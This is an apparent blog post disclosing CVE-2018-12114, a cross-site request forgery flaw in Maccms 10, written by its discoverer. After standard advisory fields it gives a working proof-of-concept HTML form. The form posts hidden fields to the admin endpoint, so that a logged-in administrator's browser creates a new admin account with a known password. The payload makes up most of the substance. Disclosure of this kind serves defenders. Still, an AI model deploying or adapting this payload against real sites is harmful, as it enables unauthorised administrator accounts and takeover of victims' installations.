CVE-2018-12114:MACCMS_V10

CVE-2018-12114
> ------------------------------------------
> [Description]
> Maccms 10 allows CSRF via admin.php/admin/admin/info.html to add user accounts.
> ------------------------------------------
> [Discoverer]
> Bay0net from JZXTSEC
> ------------------------------------------
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
> ------------------------------------------
> [Vendor of Product]
> http://www.maccms.com/down.html
> ------------------------------------------
> [Affected Product Code Base]
> maccms - v10
> ------------------------------------------
> [Attack Type]
> Remote
> ------------------------------------------
> [Impact Code execution]
> true
> ------------------------------------------
> [Impact Escalation of Privileges]
> true
> ------------------------------------------
> [Reference]
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12114
> https://www.cnblogs.com/v1vvwv/p/9168309.html
> http://www.iwantacve.cn/index.php/archives/42/
> ------------------------------------------

After the administrator logged in, open the following page,which will add users.

payload

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

posted @ 2018-06-11 17:51 Bay0net 阅读(...) 评论(...) 编辑 收藏